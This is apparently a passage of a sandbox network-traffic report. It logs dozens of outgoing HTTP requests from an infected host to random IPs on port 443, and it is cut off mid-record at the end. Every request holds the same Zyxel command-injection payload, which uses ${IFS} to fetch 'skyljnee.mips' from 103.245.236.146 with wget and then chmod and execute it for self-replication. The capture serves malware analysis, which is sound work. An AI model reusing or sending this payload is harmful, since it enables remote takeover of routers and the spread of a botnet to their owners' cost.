                                                619192.168.2.234448260.16.166.59443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590467930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                620192.168.2.2347704162.31.124.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590490103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                621192.168.2.234343012.104.179.81443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590524912 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                622192.168.2.233941483.3.164.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590567112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                623192.168.2.2342094195.162.121.67443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590574980 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                624192.168.2.2345910138.252.124.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590611935 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                625192.168.2.2350196106.244.203.167443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590620041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                626192.168.2.2348802155.172.251.66443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590667963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                627192.168.2.2345908110.134.129.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590699911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                628192.168.2.234692087.247.211.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590728045 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                629192.168.2.2358492120.99.2.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590750933 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                630192.168.2.2360596140.16.183.77443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590778112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                631192.168.2.235918480.93.136.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590799093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                632192.168.2.2337390142.131.201.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590811968 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                633192.168.2.2358160183.107.97.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590851068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                634192.168.2.2337504152.216.187.129443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590867043 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                635192.168.2.2353018189.38.233.183443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590894938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                636192.168.2.235942499.0.132.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590926886 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                637192.168.2.23436449.185.237.41443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590965986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                638192.168.2.235295474.186.20.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590965986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                639192.168.2.2342042203.40.53.168443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.590986013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                640192.168.2.2357474173.101.223.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591006041 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                641192.168.2.2348920152.137.63.144443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591059923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                642192.168.2.2338996186.187.217.121443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591088057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                643192.168.2.2350240199.245.210.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591116905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                644192.168.2.235985634.68.251.10443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591116905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                645192.168.2.2334610188.102.84.211443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591145039 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                646192.168.2.2350902182.161.143.61443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591190100 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                647192.168.2.2339640218.237.33.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591198921 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                648192.168.2.235943213.216.116.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591240883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                649192.168.2.2350154194.164.13.143443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591248035 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                650192.168.2.2351014216.66.156.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591270924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                651192.168.2.2344596211.202.138.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591306925 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                652192.168.2.233574480.33.139.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591351032 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                653192.168.2.2339484221.100.254.2443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591370106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                654192.168.2.233948088.182.90.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591403008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                655192.168.2.233561487.123.180.104443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591429949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                656192.168.2.2351622100.210.204.63443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591464996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                657192.168.2.2353244138.89.50.94443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591487885 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                658192.168.2.233874069.130.199.159443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591495037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                659192.168.2.2351900104.193.28.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591525078 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                660192.168.2.233310857.202.193.101443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591543913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                661192.168.2.233592452.96.176.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591562986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                662192.168.2.2360236175.36.238.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591593981 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                663192.168.2.23506961.223.205.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591634989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                664192.168.2.2349880222.102.217.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591640949 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                665192.168.2.234322459.101.196.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591675997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                666192.168.2.2351832159.189.226.40443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591720104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                667192.168.2.2348436162.135.78.246443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591737986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                668192.168.2.2348156106.160.66.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591774940 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                669192.168.2.23451901.11.253.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591794014 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                670192.168.2.233768295.159.234.53443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591831923 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                671192.168.2.235405272.203.90.245443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591841936 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                672192.168.2.2338092147.234.33.163443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591891050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                673192.168.2.235672039.72.195.208443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591896057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                674192.168.2.2345934170.235.78.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591950893 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                675192.168.2.2352144176.180.182.156443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591954947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                676192.168.2.233554877.150.80.174443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.591981888 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                677192.168.2.2343670217.183.188.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592019081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                678192.168.2.234279086.131.247.254443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592027903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                679192.168.2.234734438.113.244.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592082977 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                680192.168.2.234989677.144.48.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:10.592099905 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                681192.168.2.235826660.114.218.122443
                                                TimestampBytes transferredDirectionData
